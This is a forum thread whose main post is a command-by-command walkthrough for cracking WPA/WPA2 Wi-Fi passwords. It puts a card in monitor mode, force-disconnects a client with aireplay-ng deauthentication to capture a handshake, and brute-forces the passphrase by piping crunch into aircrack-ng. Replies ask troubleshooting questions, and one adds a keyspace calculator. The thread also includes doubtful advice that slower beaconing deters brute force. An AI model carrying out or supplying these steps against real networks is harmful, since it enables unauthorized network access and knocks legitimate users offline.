Well, this post is because I am tired of these dictionary files that are constantly increasing in size, to the point where they cease to be portable, so instead of buying a higher capacity USB memory I decided to do some research, and I think this is a great option to use as a last resort, as this is a brute force method. So, as the post says, the programs to use are the aircrack-ng suite and crunch. That said...

First we put our wireless card in monitor mode (open a Root Shell window):

    airmon-ng start wlan0
    airodump-ng mon0   (or ath1, or ...)

The card will start listening to networks; wait till your ESSID appears, which has to be WPA or WPA2 encoded. Mine is INFINITUMCBA277, so select yours. Now that you have the MAC address and the channel number:

    airodump-ng -c CH# --bssid 'YOURMACADDRESS' -w ESSID mon0

It should look like this:

    airodump-ng -c 6 --bssid 58:98:35:CB:A2:77 -w INFINITUMCBA277 mon0

So now we wait forever for a handshake, or we can deauthenticate a client to obtain a handshake. In order to do that we must have the MAC of the client:

    aireplay-ng -0 10 -a 'YOURMACADDRESS' -c 'CLIENTSMACADDRESS' mon0

It should look like this:

    aireplay-ng -0 10 -a 58:98:35:CB:A2:77 -c 70:D4:F2:91:AE:67 mon0

Once the user is deauthenticated and reconnects we'll obtain the handshake. If the command didn't work, well... try again. (If after you did the deauthenticate command nothing seems to happen, maybe you are too far from the client, because this command goes directly to the client's connection.)

You will see something like: WPA handshake 58:98:35:CB:A2:77

So now we use crunch. We will use the *.cap file where the handshake was saved; usually in Xiaopan OS it is in /home/tc/. So the syntax is:

    crunch 8 8 0123456789 | aircrack-ng -a 2 'HOME-TC-FILE-CAP' -e 'ESSID' -b 'HANDSHAKE' -w -

It should look like this:

    crunch 8 8 0123456789 | aircrack-ng -a 2 /home/tc/INFINITUMCBA277-02.cap -e INFINITUMCBA277 -b 58:98:35:CB:A2:77 -w -

Then you just have to wait for crunch and aircrack-ng to verify each combination.

I highlight the last command because I want to explain it so you can adapt the program to your needs:

    crunch 8 8 0123456789 | aircrack-ng -a 2 /home/tc/INFINITUMCBA277-02.cap -e INFINITUMCBA277 -b 58:98:35:CB:A2:77 -w -

So we start with the first instruction: crunch is the wordlist generator.

    crunch 8 8

Second: the '8 8' is for the length of the word in characters; the first '8' indicates the starting length and the second '8' the ending length. So if you want to test your security with a 16 character password you can change it to '16 16', or '8 16'.

    crunch 8 8 0123456789

Third: '0123456789' is the list of characters to include in the wordlist, for a numeric password. Note: 75% of users use numeric passwords. But you can also try something like '01234567890abcdefghijklf'. By using an alphanumeric wordlist the time will increase, as this is a brute force method.

    0123456789 | aircrack-ng

Fourth: this symbol is very important --> | <-- as it indicates the end of the instructions for crunch and the start of the instructions for aircrack-ng.

Last but not least: the place where the .cap file is has to be accurate.

Well, there are a lot of programs that do things like this; I just like it better to do it by myself. Well, this is it, let me know if you find this post useful.
Just curious, the wifi that I was trying to crack had a CCMP cipher, so my question is whether it is possible to crack a network with a CCMP cipher using the above method, or does it have to be a WEP or TKIP cipher?
Well, this method is for WPA/WPA2 networks, so a CCMP cipher is still WPA/WPA2. Just remember that this method is a brute force, so if you are looking forward to having a more secure network, if your router supports it, set it to only beacon once a second - that should deter anyone trying to brute force.
Let me see if I am on the same page... when you look and say crunch and type the letters, it makes the list for that? So crunch 8 8 abc will make an 8 letter word only using those 3 letters? Or did I misread something?
How fast is this? The same as a dic file or faster? I am currently hashing a 40 gig file... I have another 27 gig dic file... If this is faster I much prefer this. Also, can you do a BT (gnome) walkthrough on it, or is it the same thing?
Thank you, that was informative. I will try that later; I will have to do all letters and numbers though XD, I have a HUGE password --- Double Post Merged, 19 Nov 2012 --- @mrmanuelmtz, alt+179 = │
Guys, I managed to create a word list with Crunch. My pass phrase is abkcmtshab. In order to shorten my pentest time I use /pentest/passwords/crunch/./crunch 10 10 abchkmst -t abkc@@@@@@ -o <name.txt>. The list is only 1mb. After the 4-way handshake I started aircrack. Final result: Passphrase not in dictionary! How could this be? I've double checked to make sure abkcmtshab is in my txt file before starting aircrack. Anyone care to explain? Problem solved after running wpaclean on my cap file.
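To put numbers on the first post's remark that an alphanumeric charset makes the brute force take longer, and on the -t pattern used in the post above, here is a keyspace calculator added as an example (not the original poster's code, and not part of crunch or aircrack-ng). It counts the distinct candidates a crunch invocation emits and the worst-case time to test them all, which is the figure to look at when deciding whether your own passphrase length and charset keep this kind of attack impractical. The 2,000 keys/s rate in the demo is a constructed placeholder, not a measurement.

```python
"""Keyspace calculator for crunch-style brute force (added example, not crunch's own code)."""


def distinct_chars(charset: str) -> int:
    # Repeated characters (e.g. '01234567890abcdefghijklf' repeats '0' and 'f')
    # add no distinct candidates, so count each character once.
    return len(set(charset))


def keyspace(min_len: int, max_len: int, charset: str) -> int:
    """Distinct candidates for `crunch MIN MAX CHARSET`: every length MIN..MAX."""
    if min_len < 1 or max_len < min_len:
        raise ValueError("need 1 <= min_len <= max_len")
    n = distinct_chars(charset)
    return sum(n ** length for length in range(min_len, max_len + 1))


def pattern_keyspace(pattern: str, charset: str) -> int:
    """Distinct candidates for `crunch -t PATTERN CHARSET`.

    Only the '@' placeholder (filled from the charset given on the command
    line) is modelled; fixed characters contribute one choice each.
    Assumption: the pattern uses no other crunch placeholder type.
    """
    unsupported = [c for c in ",%^" if c in pattern]
    if unsupported:
        raise ValueError(f"placeholder(s) {unsupported} not modelled")
    return distinct_chars(charset) ** pattern.count("@")


def worst_case_seconds(candidates: int, keys_per_second: float) -> float:
    """Time to exhaust the whole space at a constant test rate."""
    if keys_per_second <= 0:
        raise ValueError("rate must be positive")
    return candidates / keys_per_second


if __name__ == "__main__":
    RATE = 2000.0  # constructed placeholder rate, not a measurement
    cases = {
        "crunch 8 8 0123456789": keyspace(8, 8, "0123456789"),
        "crunch 8 16 0123456789": keyspace(8, 16, "0123456789"),
        "crunch 8 8 01234567890abcdefghijklf": keyspace(8, 8, "01234567890abcdefghijklf"),
        "crunch 10 10 abchkmst -t abkc@@@@@@": pattern_keyspace("abkc@@@@@@", "abchkmst"),
    }
    for cmd, n in cases.items():
        days = worst_case_seconds(n, RATE) / 86400
        print(f"{cmd:42s} {n:>20,d} candidates  ~{days:,.1f} days worst case")
```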
Hi mrmanuelmtz, I like your idea of crunch and aircrack instead of a wordlist, but I don't know when you are opening a new root shell each time. Can you specify when you open a new root shell? And where should the handshake appear? Please specify this to me also. And hey, thanks very much in advance.
| is on top of the "Enter" key, under the "Backspace" key, the same key where the \ backslash is. Shift + \ will give you |
Aircrack started trying the pins and everything worked fine, but when the current passphrase reached the same numbers as my password nothing happened and it continued trying combinations. --- Double Post Merged, 12 Dec 2012 --- Hi mrmanuelmtz, your method worked with my Ralink; just wondering, does it work with the built-in wifi of the laptop? Thanks in advance.
Thanks for the reply. --- Double Post Merged, 9 Jan 2013 --- Hi, mrmanuelmtz said: "Well there's a lot of program that do things like this, i just like it better to do it by myself." Does anyone know a program that uses crunch and aircrack-ng automatically without the need of writing all these commands? And thanks in advance.